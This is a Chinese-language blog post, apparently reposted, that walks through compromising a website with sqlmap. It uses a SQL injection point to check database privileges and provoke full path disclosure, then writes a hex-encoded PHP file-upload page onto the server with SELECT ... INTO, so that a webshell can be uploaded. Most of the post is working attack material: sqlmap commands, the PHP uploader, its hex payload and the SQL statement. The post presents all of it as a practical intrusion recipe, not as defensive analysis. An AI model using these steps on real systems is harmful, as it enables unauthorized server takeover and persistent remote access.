昔日

sqlmap交互式写shell

全球互联网安全媒体知识问答平台:

1.首先是个注入点



./sqlmap.py -u http://www.sitio-web.com/parametro-vulnerable?txt_palabra=isep --dbs



2.查看当前用户,就是查看是不是root帐号(有没有权限)



./sqlmap.py -u http://www.sitio-web.com/parametro-vulnerable?txt_palabra=isep --current-user



3.想办法得到网站绝对路径(指定位置写shell)



http://www.sitio-web.com/parametro-vulnerable?txt_palabra=isep 会看到 SQL注入


http://www.sitio-web.com/parametro-vulnerable?txt_palabra=[]isep 我们看到了一个完整的路径泄露


http://www.sitio-web.com/parametro-vulnerable?txt_palabra=huey 我们看到了一个完整的路径泄露


http://www.sitio-web.com/parametro-vulnerable?txt_palabra=isep! 会看到一个完整的路径信息披露


http://www.sitio-web.com/parametro-vulnerable?txt_palabra='isep“ 我们将看到一个完整的路径信息披露



4.这里我们自己写段代码构造上传页面,代码如下



<form enctype="multipart/form-data" action="upload.php" method="POST"><input name="uploadedfile" type="file"/><input type="submit" value="Upload File"/></form> <?php $target_path=basename($_FILES['uploadedfile']['name']);if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'],$target_path)){echo basename($_FILES['uploadedfile']['name'])." has been uploaded";}else{echo "Error!";}?>



5.我们通过sqlmap的--sql-shell执行sql语句写shell,我要对构造的代码进行HEX编码(十六进制)



3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646174612220616374696f6e3d2275706c6f61642e70687022206d6574686f643d22504f5354223e3c696e707574206e616d653d2275706c6f6164656466696c652220747970653d2266696c65222f3e3c696e70757420747970653d227375626d6974222076616c75653d2255706c6f61642046696c65222f3e3c2f666f726d3e0d0a3c3f70687020247461726765745f706174683d626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d293b6966286d6f76655f75706c6f616465645f66696c6528245f46494c45535b2775706c6f6164656466696c65275d5b27746d705f6e616d65275d2c247461726765745f7061746829297b6563686f20626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d292e2220686173206265656e2075706c6f61646564223b7d656c73657b6563686f20224572726f7221223b7d3f3e



6.好,我们开始主题。对sql语句进行构造进行写shell操作SELECT + 0x + 十六进制代码 + INTO + 完整路径 +上传文件名



select 0x3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646174612220616374696f6e3d2275706c6f61642e70687022206d6574686f643d22504f5354223e3c696e707574206e616d653d2275706c6f6164656466696c652220747970653d2266696c65222f3e3c696e70757420747970653d227375626d6974222076616c75653d2255706c6f61642046696c65222f3e3c2f666f726d3e0d0a3c3f70687020247461726765745f706174683d626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d293b6966286d6f76655f75706c6f616465645f66696c6528245f46494c45535b2775706c6f6164656466696c65275d5b27746d705f6e616d65275d2c247461726765745f7061746829297b6563686f20626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d292e2220686173206265656e2075706c6f61646564223b7d656c73657b6563686f20224572726f7221223b7d3f3e


into "/espejo/htdocs.v2/portalnuevo/buscadores/upload.php"; 



7.OK!我们上传成功,反问upload.php上传我们的webshell。







评论

热度(1)

  1. 昔日全球互联网安全媒体知识问答平台 转载了此文字